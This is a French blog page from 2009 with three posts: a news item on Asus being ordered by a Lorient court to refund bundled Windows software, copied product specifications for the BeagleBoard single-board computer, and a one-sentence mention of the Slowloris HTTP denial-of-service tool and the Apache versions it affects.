December 3rd, 2009

Asus condamné pour une vente forcée de Windows

par Manuel Raynaud

tags : logiciel libre , justice , économie

CC Mr Conguito

Eric Magnien est doublement soulagé. Le tribunal de Lorient vient de lui donner une seconde fois raison dans le différend qui l’opposait à Asus. Le 27 mai 2008, il s’était offert un ordinateur portable mais, comme la loi le prévoit, ne souhaitait pas conserver Windows Vista vendu avec. Il préfère utiliser des logiciels libres.

Problème : quand il allume l’ordinateur, il lui est impossible de ne pas passer par la case « installation de Vista » et donc le contrat de licence Windows y afférant. C’en est trop : il prend contact avec Asus qui lui propose de faire le vide du disque dur mais « aux frais du client ». Autrement dit, c’est à lui de payer le transport. Le constructeur lui promet également un chèque de remboursement de 40 euros en échange du logiciel Vista.

Ces conditions ne lui conviennent pas. Il se rend devant le tribunal de proximité de Lorient qui lui donne raison une première fois le 27 août. Asus y est condamné à lui verser 205€ ainsi que 500€ pour les frais de justice. « Il ne peut être sérieusement contesté que les modalités de la vente liée mise en place par la société ASUS ont pour effet de contraindre de manière quasi directe le consommateur de conserver le système d’exploitation Windows de Microsoft », note alors le jugement.

Puis, une seconde fois le 12 novembre après qu’Asus ait fait appel du premier jugement. Et cette fois-ci, la condamnation est même un peu plus forte : 400€ à titre de dommages et intérêts et 250€ pour les frais engagés. Cette somme s’ajoute à la première condamnation. Au total, Eric Magnien a reçu un chèque de 1405,90€ comme le montre l’Association Francophone des Utilisateurs de Logiciels Libres (AFUL). Ironique puisqu’à l’origine, il n’en demandait pas tant, seulement 205€ soit l’équivalent des prix cumulés de Windows Vista Home Premium, d’Office One et de Nero 7.

Pour l’AFUL, qui milite contre ce système de ventes liées, cette somme résulte « de l’entêtement totalement déraisonnable du constructeur » et, renforcée par ce jugement, « appelle à la multiplication des demandes de remboursement auprès des constructeurs de la part de ceux qui n’ont pas besoin des licences imposées, notamment de la part des étudiants et enseignants qui bénéficient déjà de licences, gratuites ou non, pour ces mêmes logiciels ou pour d’autres ».

via Asus condamné pour une vente forcée de Windows- Ecrans.

Posted in Culture, Divers, Nouvelles du net | No Comments »

BeagleBoard.org - hardware

December 3rd, 2009

BeagleBoard.org - hardware.

Product Details

The USB-powered Beagle Board is a low-cost, fan-less single board computer that unleashes laptop-like performance and expandability without the bulk, expense, or noise of typical desktop machines.

OMAP3530 processor highlights:

  • Over 1,200 Dhrystone MIPS using the superscalar ARM Cortex-A8 with highly accurate branch prediction and 256KB L2 cache running at up to 600MHz
  • OpenGL© ES 2.0 capable 2D/3D graphics accelerator capable of rendering 10 million polygons per second
  • HD video capable TMS320C64x+ DSP for versatile signal processing at up to 430MHz
  • USB power via complete chip-set with minimal additional power-consuming logic

Expansion capability and power options to satisfy your imagination:

  • DVI-D for connecting digital computer monitors
  • Compatibility with a huge collection of USB peripherals including hubs, keyboards, mice, WiFi, Bluetooth, web cameras, and much more
  • MMC+/SD/SDIO interface for memory or wireless connectivity
  • S-Video out for connecting your NTSC or PAL television or wearable visor
  • Stereo audio in and out for a microphone and headphones or speakers
  • Power via typical USB chargers for cell phones from your laptop, from an automobile adapter, from batteries, or even from a solar backpack

Posted in Bot, Programmation | No Comments »

Slowloris HTTP DoS

June 24th, 2009

Slowloris permet de réaliser des attaques par Déni de Service via des requêtes HTTP partielles permettant d’exploiter une faille de conception dans l’implémentation du protocole HTTP de nombreux serveurs Web donc les branches 1.x et 2.x d’Apache

Slowloris HTTP DoS.

Posted in Divers | No Comments »

« Older Entries